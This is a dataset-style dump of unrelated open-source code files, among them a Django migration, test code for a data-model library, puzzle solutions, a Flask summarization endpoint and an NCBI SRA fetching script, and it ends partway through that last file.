import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=128)),
('link', models.URLField(max_length=256)),
('creation_date', models.DateField(default=django.utils.timezone.now)),
('upvotes', models.IntegerField(default=0)),
('author', models.CharField(max_length=128)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=128)),
('content', models.TextField()),
('creation_date', models.DateField(default=django.utils.timezone.now)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='posts', to='news_posts.Post')),
],
),
]
| 1.804688 | 2 |
server/workers/services/src/apis/utils.py | dasch124/Headstart | 1 | 12759634 | import json
import time
def get_key(store, key):
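    """Poll the store until '<key>_output' appears, then return its JSON value.
    Once read, both the original key and the '<key>_output' entry are deleted.
    Polls every half second; there is no timeout.
    """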
while True:
res = store.get(key+"_output")
if res is None:
time.sleep(0.5)
else:
result = json.loads(res.decode('utf-8'))
store.delete(key)
store.delete(key+"_output")
break
return result
| 2.78125 | 3 |
objectModel/Python/tests/cdm/projection/test_projection_object_model.py | jocubeit/CDM | 265 | 12759635 | <filename>objectModel/Python/tests/cdm/projection/test_projection_object_model.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from cdm.enums import CdmObjectType
from cdm.enums.cdm_operation_type import CdmOperationType
from cdm.objectmodel import CdmCorpusDefinition, CdmFolderDefinition, CdmProjection, CdmOperationAddCountAttribute, \
CdmOperationAddSupportingAttribute, CdmOperationAddTypeAttribute, CdmOperationExcludeAttributes, CdmOperationArrayExpansion, \
CdmOperationCombineAttributes, CdmOperationRenameAttributes, CdmOperationReplaceAsForeignKey, CdmOperationIncludeAttributes, CdmObject
from cdm.storage import LocalAdapter
from tests.common import async_test, TestHelper
from tests.utilities.projection_test_utils import ProjectionTestUtils
class ProjectionObjectModelTest(unittest.TestCase):
foundation_json_path = 'cdm:/foundations.cdm.json'
# The path between TestDataPath and TestName.
tests_subpath = os.path.join('Cdm', 'Projection')
@async_test
async def test_projection_using_object_model(self):
"""Basic test to save projection based entities and then try to reload them and validate that the projections were persisted correctly"""
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, 'test_projection_using_object_model')
corpus.storage.mount('local', LocalAdapter(TestHelper.get_actual_output_folder_path(self.tests_subpath, 'test_projection_using_object_model')))
local_root = corpus.storage.fetch_root_folder('local')
manifest_default = self._create_default_manifest(corpus, local_root)
entity_test_source = self._create_entity_test_source(corpus, manifest_default, local_root)
entity_test_entity_projection = self._create_entity_test_entity_projection(corpus, manifest_default, local_root)
entity_test_entity_nested_projection = self._create_entity_test_entity_nested_projection(corpus, manifest_default, local_root)
entity_test_entity_attribute_projection = self._create_entity_test_entity_attribute_projection(corpus, manifest_default, local_root)
entity_test_operation_collection = self._create_entity_test_operation_collection(corpus, manifest_default, local_root)
# Save manifest and entities
await manifest_default.save_as_async('{}.manifest.cdm.json'.format(manifest_default.manifest_name), True)
expected = 'TestSource'
expected_type = CdmObjectType.PROJECTION_DEF
actual = None
actual_type = CdmObjectType.ERROR
# Try to read back the newly persisted manifest and projection based entities
manifest_read_back = await corpus.fetch_object_async('local:/{}.manifest.cdm.json'.format(manifest_default.manifest_name))
self.assertEqual(5, len(manifest_read_back.entities))
self.assertEqual(entity_test_source.entity_name, manifest_read_back.entities[0].entity_name)
self.assertEqual(entity_test_entity_projection.entity_name, manifest_read_back.entities[1].entity_name)
self.assertEqual(entity_test_entity_nested_projection.entity_name, manifest_read_back.entities[2].entity_name)
self.assertEqual(entity_test_entity_attribute_projection.entity_name, manifest_read_back.entities[3].entity_name)
# Read back the newly persisted manifest and projection based entity TestEntityProjection and validate
entity_test_entity_projection_read_back = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_test_entity_projection.entity_name, entity_test_entity_projection.entity_name), manifest_read_back)
self.assertIsNotNone(entity_test_entity_projection_read_back)
actual = entity_test_entity_projection_read_back.extends_entity.explicit_reference.source.named_reference
actual_type = entity_test_entity_projection_read_back.extends_entity.explicit_reference.object_type
self.assertEqual(expected, actual)
self.assertEqual(expected_type, actual_type)
# Read back the newly persisted manifest and projection based entity TestEntityNestedProjection and validate
entity_test_entity_nested_projection_read_back = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_test_entity_nested_projection.entity_name, entity_test_entity_nested_projection.entity_name), manifest_read_back)
self.assertIsNotNone(entity_test_entity_nested_projection_read_back)
actual = entity_test_entity_nested_projection_read_back.extends_entity.explicit_reference.source.explicit_reference.source.explicit_reference.source.named_reference
actual_type = entity_test_entity_nested_projection_read_back.extends_entity.explicit_reference.source.explicit_reference.source.explicit_reference.object_type
self.assertEqual(expected, actual)
self.assertEqual(expected_type, actual_type)
# Read back the newly persisted manifest and projection based entity TestEntityAttributeProjection and validate
entity_test_entity_attribute_projection_read_back = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_test_entity_attribute_projection.entity_name, entity_test_entity_attribute_projection.entity_name), manifest_read_back)
self.assertIsNotNone(entity_test_entity_attribute_projection_read_back)
actual = entity_test_entity_attribute_projection_read_back.attributes[0].entity.explicit_reference.source.named_reference
actual_type = entity_test_entity_attribute_projection_read_back.attributes[0].entity.explicit_reference.object_type
self.assertEqual(expected, actual)
self.assertEqual(expected_type, actual_type)
# Read back operations collections and validate
entity_test_operation_collection_read_back = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_test_operation_collection.entity_name, entity_test_operation_collection.entity_name), manifest_read_back)
self.assertIsNotNone(entity_test_operation_collection_read_back)
actual_operation_count = len(entity_test_operation_collection_read_back.extends_entity.explicit_reference.operations)
self.assertEqual(9, actual_operation_count)
operations = entity_test_operation_collection_read_back.extends_entity.explicit_reference.operations
self.assertEqual(CdmOperationType.ADD_COUNT_ATTRIBUTE, operations[0].type)
self.assertEqual(CdmOperationType.ADD_SUPPORTING_ATTRIBUTE, operations[1].type)
self.assertEqual(CdmOperationType.ADD_TYPE_ATTRIBUTE, operations[2].type)
self.assertEqual(CdmOperationType.EXCLUDE_ATTRIBUTES, operations[3].type)
self.assertEqual(CdmOperationType.ARRAY_EXPANSION, operations[4].type)
self.assertEqual(CdmOperationType.COMBINE_ATTRIBUTES, operations[5].type)
self.assertEqual(CdmOperationType.RENAME_ATTRIBUTES, operations[6].type)
self.assertEqual(CdmOperationType.REPLACE_AS_FOREIGN_KEY, operations[7].type)
self.assertEqual(CdmOperationType.INCLUDE_ATTRIBUTES, operations[8].type)
def _create_default_manifest(self, corpus: 'CdmCorpusDefinition', local_root: 'CdmFolderDefinition') -> 'CdmManifestDefinition':
"""Create a default manifest"""
manifest_name = 'default'
manifest_doc_name = '{}.manifest.cdm.json'.format(manifest_name)
manifest_default = corpus.make_object(CdmObjectType.MANIFEST_DEF, manifest_name)
local_root.documents.append(manifest_default, manifest_doc_name)
return manifest_default
def _create_entity_test_source(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition') -> 'CdmEntityDefinition':
"""Create a simple entity called 'TestSource' with a single attribute"""
entity_name = 'TestSource'
entity_test_source = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
attribute_name = 'TestAttribute'
entity_test_attribute = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, attribute_name, False)
entity_test_attribute.data_type = corpus.make_ref(CdmObjectType.DATA_TYPE_REF, 'string', True)
entity_test_attribute.purpose = corpus.make_ref(CdmObjectType.PURPOSE_REF, 'hasA', True)
entity_test_attribute.display_name = attribute_name
entity_test_source.attributes.append(entity_test_attribute)
entity_test_source_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_source_doc.imports.append(self.foundation_json_path)
entity_test_source_doc.definitions.append(entity_test_source)
local_root.documents.append(entity_test_source_doc, entity_test_source_doc.name)
manifest_default.entities.append(entity_test_source)
return entity_test_source
def _create_projection(self, corpus: 'CdmCorpusDefinition') -> 'CdmProjection':
"""Create a simple projection object"""
projection = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection.source = corpus.make_object(CdmObjectType.ENTITY_REF, 'TestSource', True)
return projection
def _create_nested_projection(self, corpus: 'CdmCorpusDefinition') -> 'CdmProjection':
"""Create a 3-level nested projection object"""
projection3 = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection3.source = corpus.make_object(CdmObjectType.ENTITY_REF, 'TestSource', True)
inline_projection_entity_ref3 = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref3.explicit_reference = projection3
projection2 = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection2.source = inline_projection_entity_ref3
inline_projection_entity_ref2 = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref2.explicit_reference = projection2
projection1 = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection1.source = inline_projection_entity_ref2
return projection1
def _create_entity_test_entity_projection(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition') -> 'CdmEntityDefinition':
"""Create an entity 'TestEntityProjection' that extends from a projection"""
entity_name = 'TestEntityProjection'
inline_projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref.explicit_reference = self._create_projection(corpus)
entity_test_entity_projection = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
entity_test_entity_projection.extends_entity = inline_projection_entity_ref
entity_test_entity_projection_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_entity_projection_doc.imports.append(self.foundation_json_path)
entity_test_entity_projection_doc.imports.append('TestSource.cdm.json')
entity_test_entity_projection_doc.definitions.append(entity_test_entity_projection)
local_root.documents.append(entity_test_entity_projection_doc, entity_test_entity_projection_doc.name)
manifest_default.entities.append(entity_test_entity_projection)
return entity_test_entity_projection
def _create_entity_test_entity_nested_projection(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition') -> 'CdmEntityDefinition':
"""Create an entity 'TestEntityNestedProjection' that extends from a projection"""
entity_name = 'TestEntityNestedProjection'
inline_projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref.explicit_reference = self._create_nested_projection(corpus)
entity_test_entity_nested_projection = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
entity_test_entity_nested_projection.extends_entity = inline_projection_entity_ref
entity_test_entity_nested_projection_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_entity_nested_projection_doc.imports.append(self.foundation_json_path)
entity_test_entity_nested_projection_doc.imports.append('TestSource.cdm.json')
entity_test_entity_nested_projection_doc.definitions.append(entity_test_entity_nested_projection)
local_root.documents.append(entity_test_entity_nested_projection_doc, entity_test_entity_nested_projection_doc.name)
manifest_default.entities.append(entity_test_entity_nested_projection)
return entity_test_entity_nested_projection
def _create_entity_test_entity_attribute_projection(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition') -> 'CdmEntityDefinition':
"""Create an entity 'TestEntityAttributeProjection' that contains an entity attribute with a projection as a source entity"""
entity_name = 'TestEntityAttributeProjection'
inline_projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref.explicit_reference = self._create_projection(corpus)
entity_test_entity_attribute_projection = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
attribute_name = 'TestAttribute'
entity_test_entity_attribute = corpus.make_object(CdmObjectType.ENTITY_ATTRIBUTE_DEF, attribute_name, False)
entity_test_entity_attribute.entity = inline_projection_entity_ref
entity_test_entity_attribute_projection.attributes.append(entity_test_entity_attribute)
entity_test_entity_attribute_projection_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_entity_attribute_projection_doc.imports.append(self.foundation_json_path)
entity_test_entity_attribute_projection_doc.imports.append('TestSource.cdm.json')
entity_test_entity_attribute_projection_doc.definitions.append(entity_test_entity_attribute_projection)
local_root.documents.append(entity_test_entity_attribute_projection_doc, entity_test_entity_attribute_projection_doc.name)
manifest_default.entities.append(entity_test_entity_attribute_projection)
return entity_test_entity_attribute_projection
def _create_projection_with_operation_collection(self, corpus: 'CdmCorpusDefinition', owner: 'CdmObject') -> 'CdmProjection':
"""Create a projection object with operations"""
projection = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection.source = corpus.make_object(CdmObjectType.ENTITY_REF, 'TestSource', True)
# AddCountAttribute Operation
add_count_attribute_op = CdmOperationAddCountAttribute(corpus.ctx)
add_count_attribute_op.count_attribute = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'countAtt')
projection.operations.append(add_count_attribute_op)
# AddSupportingAttribute Operation
add_supporting_attribute_op = CdmOperationAddSupportingAttribute(corpus.ctx)
add_supporting_attribute_op.supporting_attribute = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'supportingAtt')
projection.operations.append(add_supporting_attribute_op)
# AddTypeAttribute Operation
add_type_attribute_op = CdmOperationAddTypeAttribute(corpus.ctx)
add_type_attribute_op.type_attribute = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'typeAtt')
projection.operations.append(add_type_attribute_op)
# ExcludeAttributes Operation
exclude_attributes_op = CdmOperationExcludeAttributes(corpus.ctx)
exclude_attributes_op.exclude_attributes = []
exclude_attributes_op.exclude_attributes.append('testAttribute1')
projection.operations.append(exclude_attributes_op)
# ArrayExpansion Operation
array_expansion_op = CdmOperationArrayExpansion(corpus.ctx)
array_expansion_op.start_ordinal = 0
array_expansion_op.end_ordinal = 1
projection.operations.append(array_expansion_op)
# CombineAttributes Operation
combine_attributes_op = CdmOperationCombineAttributes(corpus.ctx)
combine_attributes_op.select = []
combine_attributes_op.merge_into = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'combineAtt')
combine_attributes_op.select.append('testAttribute1')
projection.operations.append(combine_attributes_op)
# RenameAttributes Operation
rename_attributes_op = CdmOperationRenameAttributes(corpus.ctx)
rename_attributes_op.rename_format = '{m}'
projection.operations.append(rename_attributes_op)
# ReplaceAsForeignKey Operation
replace_as_foreign_key_op = CdmOperationReplaceAsForeignKey(corpus.ctx)
replace_as_foreign_key_op.reference = 'testAttribute1'
replace_as_foreign_key_op.replace_with = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'testForeignKey', False)
projection.operations.append(replace_as_foreign_key_op)
# IncludeAttributes Operation
include_attributes_op = CdmOperationIncludeAttributes(corpus.ctx)
include_attributes_op.include_attributes = []
include_attributes_op.include_attributes.append('testAttribute1')
projection.operations.append(include_attributes_op)
return projection
def _create_entity_test_operation_collection(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition'):
"""Create an entity 'TestOperationCollection' that extends from a projection with a collection of operations"""
entity_name = 'TestOperationCollection'
inline_projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None)
entity_test_operation_collection = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
inline_projection_entity_ref.explicit_reference = self._create_projection_with_operation_collection(corpus, entity_test_operation_collection)
entity_test_operation_collection.extends_entity = inline_projection_entity_ref
entity_test_operation_collection_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_operation_collection_doc.imports.append(self.foundation_json_path)
entity_test_operation_collection_doc.imports.append('TestSource.cdm.json')
entity_test_operation_collection_doc.definitions.append(entity_test_operation_collection)
local_root.documents.append(entity_test_operation_collection_doc, entity_test_operation_collection_doc.name)
manifest_default.entities.append(entity_test_operation_collection)
return entity_test_operation_collection
| 2.15625 | 2 |
nes/processors/cpu/instructions/flags/sed.py | Hexadorsimal/pynes | 1 | 12759636 | from .set import SetInstruction
class Sed(SetInstruction):
flag_name = 'd'
| 1.679688 | 2 |
kafka_utils/kafka_rolling_restart/task.py | dbgrigsby/kafka-utils | 302 | 12759637 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import shlex
class TaskFailedException(Exception):
pass
class Task(object):
"""Base class for implementing Task
All the args passed can be accessed via self.args
:param args: The program arguments
"""
def __init__(self, args):
if args:
self.args = self.parse_args(list(
shlex.split(args)
))
else:
self.args = self.parse_args([])
def parse_args(self, args):
"""Parse args command line arguments.
:param args: The list of arguments as strings.
"""
pass
def run(self, host):
"""This contains the main logic of the task
Please note an exception from this method will completely stop the restart
:param host: the host on which precheck is executed on
:type host: string
"""
raise NotImplementedError("Implemented in subclass")
class PreStopTask(Task):
"""Class to be used for any pre stop checks"""
class PostStopTask(Task):
"""Class to be used for any post stop checks"""
| 2.390625 | 2 |
app/models/Person.py | illeatmyhat/flask-swagger-mongo | 0 | 12759638 | <reponame>illeatmyhat/flask-swagger-mongo
from marshmallow_mongoengine import ModelSchema
from flask_admin.contrib.mongoengine import ModelView
from mongoengine.connection import get_db
from pymongo import TEXT
from slugify import slugify
from . import db, definitions
definitions['Person'] = {
'type': 'object',
'properties': {
'first_name': {
'type': 'string'
},
'last_name': {
'type': 'string'
},
'email': {
'type': 'string'
},
'slug': {
'type': 'string'
},
'aliases': {
'type': 'array',
'items': {
'type': 'string'
}
}
},
'example': {
'first_name': 'John',
'last_name': 'Smith',
'email': '<EMAIL>',
'slug': 'john-smith-usa-example-com',
'aliases': ['<NAME>', '<NAME>']
}
}
class Person(db.Document):
first_name = db.StringField(max_length=100, required=True)
last_name = db.StringField(max_length=100, required=True)
email = db.EmailField(max_length=100, required=True)
slug = db.StringField(max_length=100) # hidden field
aliases = db.ListField(db.StringField(max_length=100))
    # The full-text search index is created directly through PyMongo in __init__ below.
def __init__(self, *args, **values):
super().__init__(*args, **values)
mongo = get_db()['Person']
if '$**_text' not in mongo.index_information():
mongo.create_index([('$**', TEXT)])
def __unicode__(self):
return self.email
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.email)
return super(Person, self).save(*args, **kwargs)
@staticmethod
def serialize(person):
return person_schema.dump(person).data
@staticmethod
def deserialize(person):
return person_schema.load(person).data
class PersonSchema(ModelSchema):
class Meta:
model = Person
class PersonView(ModelView):
form_excluded_columns = {'slug'}
column_filters = ['first_name']
column_list = ('first_name', 'last_name', 'email', 'slug', 'aliases')
person_schema = PersonSchema()
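# Illustrative usage sketch (not part of the original module); it assumes a
# configured MongoDB connection, and the field values are made-up examples.
if __name__ == '__main__':
    ada = Person(first_name='Ada', last_name='Lovelace',
                 email='ada@example.org')
    ada.save()  # save() derives the slug from the email on first save
    print(Person.serialize(ada))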
| 2.34375 | 2 |
2020/01.py | sumnerevans/advent-of-code | 5 | 12759639 | #! /usr/bin/env python3
from typing import List
with open("inputs/01.txt") as f:
lines: List[str] = [l.strip() for l in f.readlines()]
expenses = sorted(int(l) for l in lines)
L = len(expenses)
print("Part 1:")
def part1() -> int:
    for a in expenses:
        complement = 2020 - a
        # Binary search for the complement; remember the previous midpoint and
        # stop once the search interval can no longer shrink.
        low, hi = 0, L
        prev = -1
        while True:
            mid_idx = low + (hi - low) // 2
            if mid_idx == prev:
                break
            prev = mid_idx
            mid = expenses[mid_idx]
            if mid == complement:
                return a * complement
            elif mid < complement:
                low = mid_idx
            else:
                hi = mid_idx
    assert False
ans_part1 = part1()
print(ans_part1)
assert ans_part1 == 355875
print("Part 2:")
def part2() -> int:
for i, a in enumerate(expenses):
for j, b in enumerate(expenses):
if i < j:
continue
for k, c in enumerate(expenses):
if k < j or k < i:
continue
if a + b + c == 2020:
return a * b * c
assert False
ans_part2 = part2()
print(ans_part2)
assert ans_part2 == 140379120
| 3.5 | 4 |
planar_ising/common_utils.py | ValeryTyumen/planar_ising | 8 | 12759640 | <reponame>ValeryTyumen/planar_ising<gh_stars>1-10
import numpy as np
def repeat_int(value, count):
array = np.zeros(count, dtype=np.int32)
array[:] = value
return array
def repeat_bool(value, count):
array = np.zeros(count, dtype=np.bool_)
array[:] = value
return array
def repeat_float(value, count):
array = np.zeros(count, dtype=np.float32)
array[:] = value
return array
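# Illustrative check (not part of the original module): each helper behaves
# like numpy.full for its dtype.
if __name__ == '__main__':
    assert (repeat_int(7, 3) == np.full(3, 7, dtype=np.int32)).all()
    assert (repeat_bool(True, 2) == np.full(2, True, dtype=np.bool_)).all()
    assert (repeat_float(0.5, 4) == np.full(4, 0.5, dtype=np.float32)).all()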
| 2.59375 | 3 |
ba5g-edit-distance/edit_distance.py | kjco/bioinformatics-algorithms | 0 | 12759641 | ##str1 = 'PLEASANTLY'
##str2 = 'MEANLY'
with open('dataset_77_3.txt','r') as f:
str1 = f.readline().strip()
str2 = f.readline().strip()
# Initialize the matrix
m = [[0 for j in range(len(str2)+1)] for i in range(len(str1)+1)]
#b = [[0 for j in range(len(str2)+1)] for i in range(len(str1)+1)]
# m = [ [0] * (len(str2)+1) ] * (len(str1)+1)
# b = [ [0] * (len(str2)+1) ] * (len(str1)+1)
#print 'matrix is %dx%d' % (len(m), len(m[0]))
for j in range(len(str2)+1):
m[0][j] = j
for i in range(len(str1)+1):
m[i][0] = i
#print m
# Fill the DP table: m[i][j] is the edit distance between str1[:i] and str2[:j],
# taking the cheapest of deletion, insertion, substitution, or a free match.
for i in range(1, len(str1)+1):
    for j in range(1, len(str2)+1):
        m[i][j] = m[i-1][j] + 1                  # deletion
        if m[i][j-1] + 1 < m[i][j]:
            m[i][j] = m[i][j-1] + 1              # insertion
        if m[i-1][j-1] + 1 < m[i][j]:
            m[i][j] = m[i-1][j-1] + 1            # substitution
        if str1[i-1] == str2[j-1] and m[i-1][j-1] < m[i][j]:
            m[i][j] = m[i-1][j-1]                # characters match
#print i,j, m[i][j], b[i][j]
#print b
#print m
print(m[len(str1)][len(str2)])
| 3.15625 | 3 |
python3/135.candy.340359562.ac.py | Diego-Zulu/leetcode_answers | 0 | 12759642 | <gh_stars>0
#
# @lc app=leetcode id=135 lang=python3
#
# [135] Candy
#
# https://leetcode.com/problems/candy/description/
#
# algorithms
# Hard (30.87%)
# Likes: 815
# Dislikes: 154
# Total Accepted: 125.7K
# Total Submissions: 406.8K
# Testcase Example: '[1,0,2]'
#
# There are N children standing in a line. Each child is assigned a rating
# value.
#
# You are giving candies to these children subjected to the following
# requirements:
#
#
# Each child must have at least one candy.
# Children with a higher rating get more candies than their neighbors.
#
#
# What is the minimum candies you must give?
#
# Example 1:
#
#
# Input: [1,0,2]
# Output: 5
# Explanation: You can allocate to the first, second and third child with 2, 1,
# 2 candies respectively.
#
#
# Example 2:
#
#
# Input: [1,2,2]
# Output: 4
# Explanation: You can allocate to the first, second and third child with 1, 2,
# 1 candies respectively.
# The third child gets 1 candy because it satisfies the above two
# conditions.
#
#
#
# @lc code=start
class Solution:
def candy(self, ratings: List[int]) -> int:
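        """Single pass over the ratings with O(1) extra bookkeeping.
        Give one more candy than the previous child on every ascent; reset to
        one otherwise. While descending after the handout has already bottomed
        out at one, retroactively grant one extra candy per child since the
        last peak; the peak is spared only while its own candy count still
        exceeds the length of the descent so far.
        """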
last_max_pos = -1
last_max_candies = -1
candies = 0
last_candy_gave = 0
for i, r in enumerate(ratings):
last_rating = ratings[i-1] if i > 0 else -1
candy_to_give = last_candy_gave
if r > last_rating:
candy_to_give += 1
else:
candy_to_give = 1
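            # Descending run has bottomed out at one: give one more candy to
            # every child since the last peak (the peak joins the bump only
            # once the run is at least as long as its own candy count).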
if r < last_rating and last_candy_gave == candy_to_give:
diff = i - last_max_pos
candies += diff
if diff < last_max_candies:
candies -= 1
candies += candy_to_give
last_candy_gave = candy_to_give
if r >= last_rating:
last_max_pos = i
last_max_candies = candy_to_give
return candies
# @lc code=end
| 3.625 | 4 |
tess/server/blueprints/summarization_bp.py | ashishbaghudana/tess | 1 | 12759643 | import json
import os
import uuid
import mongoengine
from flask import Blueprint, jsonify, request
from werkzeug.utils import secure_filename
from tess.config import UPLOAD_FILES
from tess.server.models import SummarizationDocument
summarization_bp = Blueprint('summarization_api', __name__)
@summarization_bp.route('', methods=['GET', 'POST'])
def summarize():
if request.method == 'POST':
body = request.form.to_dict()
if 'file' not in request.files:
return jsonify({'error': 400, 'message': 'Must supply a file'}), 400
if not allowed_file(request.files['file'].filename):
return jsonify({'error': 400, 'message': 'The file must be .txt'}), 400
if 'algorithm' not in body:
return jsonify({'error': 400, 'message': 'Algorithm should be specified'}), 400
file = request.files['file']
filename = secure_filename(file.filename)
renamed_file = f"{uuid.uuid4().hex}.{get_extension(filename)}"
file.save(os.path.join(UPLOAD_FILES, renamed_file))
doc = SummarizationDocument(document_path=os.path.join(UPLOAD_FILES, renamed_file), algorithm=body['algorithm'])
if 'tokenized' in body and body['tokenized']:
doc.tokenized = True
with open(os.path.join(UPLOAD_FILES, renamed_file)) as f:
doc.processed_text = f.read().strip()
if 'tokenizer' in body:
doc.tokenizer = body['tokenizer']
if 'target' in request.files:
target_summary = request.files['target'].stream.read().decode()
doc.target_summary = target_summary
doc.status = 'NEW'
doc.save()
return jsonify(json.loads(doc.to_json())), 201
if request.method == 'GET':
documents = []
for doc in SummarizationDocument.objects():
documents.append({'id': str(doc.id),
'status': doc.status,
'algorithm': doc.algorithm,
'created_at': doc.created_at
})
return jsonify(documents)
@summarization_bp.route('/<doc_id>', methods=['GET'])
def get_summary(doc_id):
try:
document = SummarizationDocument.objects.get(pk=doc_id)
return jsonify(json.loads(document.to_json()))
except mongoengine.errors.DoesNotExist as _:
        return jsonify({'error': 404, 'message': 'ID does not exist'}), 404
except mongoengine.errors.ValidationError as _:
        return jsonify({'error': 400, 'message': 'ID is in an invalid format'}), 400
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() == 'txt'
def get_extension(filename):
return filename.rsplit('.', 1)[1].lower()
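# Illustrative request (not part of the original module); the host, port, and
# the URL prefix this blueprint is mounted under are assumptions, as is the
# algorithm name:
#   curl -F 'file=@post.txt' -F 'algorithm=textrank' \
#        http://localhost:5000/summarization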
| 2.21875 | 2 |
sra.py | nelas/sra.py | 5 | 12759644 | <gh_stars>1-10
#!/usr/bin/env python
'''Search & Fetch records from NCBI's Sequence Read Archive.
Use http://www.ncbi.nlm.nih.gov/sra/advanced to build a query and the script
will output a CSV file with the results. Example:
./sra.py -s 'agalma[Organism]' -m 3 -o sra_output -e <EMAIL>
More fine-grained filtering based on read length, library layout, number of
spots, platform, etc. needs to be done in a separate script that imports this
program as a module. Check fetch_sra.py for an example of how to filter.
'''
import argparse
import os
import pandas as pd
import re
from Bio import Entrez
class SRADatabase:
'''General information about SRA Database'''
def __init__(self):
einfo_handle = Entrez.einfo(db='sra')
einfo = Entrez.read(einfo_handle, validate=False)
# Define attributes.
self.count = einfo['DbInfo']['Count']
self.last_update = einfo['DbInfo']['LastUpdate']
self.menu_name = einfo['DbInfo']['MenuName']
self.description = einfo['DbInfo']['Description']
self.link_list = einfo['DbInfo']['LinkList']
self.field_list = einfo['DbInfo']['FieldList']
self.einfo = einfo
print('\n' + self.description + ' (%s)' % self.menu_name)
print(self.count + ' entries, last updated in ' + self.last_update)
print('Available search fields: ')
for field in self.field_list:
print('\t[%s] %s | %s (%s terms)' % (field['Name'], field['FullName'], field['Description'], field['TermCount']))
# TODO Use def __unicode__ or __str__ to identify class objects.
class SRASearch:
'''Perform search and keep IDs of SRA packages.
Example of query:
((((("strategy rna seq"[Properties]) AND "platform illumina"[Properties])
AND metazoa[Organism]) NOT vertebrata[Organism]) NOT insects[Organism]) AND
("2000/01/01"[Modification Date] : "3000"[Modification Date])
'''
def __init__(self, query, retmax, email):
# Required arguments.
# TODO Cache search based on query. Store list of IDs!
self.query = query
if int(retmax) > 100000:
# Limit defined by Entrez.
self.retmax = 100000
else:
self.retmax = retmax
Entrez.email = email
# Search metadata.
self.count = None
self.retstart = None
self.query_translation = None
self.idlist = None
# Additional attributes.
self.results = None
self.database = SRADatabase()
# TODO Add timestamp.
def esearch(self):
'''Search SRA packages with Entrez using query.'''
handle = Entrez.esearch(db='sra', term=self.query, retmax=self.retmax)
self.results = Entrez.read(handle)
self.parse_results()
print('\nSuccess! %s results found.' % self.count)
print('Your query was: %s' % self.query_translation)
print('Returned IDs (max=%s): %s' % (self.retmax, ', '.join(self.idlist)))
return self.results
def parse_results(self):
'''Populate class attributes by parsing results.'''
self.count = self.results['Count']
self.retstart = self.results['RetStart']
self.query_translation = self.results['QueryTranslation']
self.idlist = self.results['IdList']
print('\nFetched %d package IDs.' % len(self.idlist))
class SRAPackage:
'''Fetch and store metadata from a SRA package.'''
def __init__(self, sra_id):
self.id = sra_id
self.record = None
self.cached_filepath = os.path.join('.cache', self.id)
self.accession = None
self.title = None
self.study_title = None
self.library_strategy = None
self.library_layout = None
self.instrument_model = None
self.taxon_id = None
self.scientific_name = None
self.lineage = None
self.run_accession = None
self.nreads = None
self.read_average = None
self.total_spots = None
self.total_bases = None
self.size = None
self.published = None
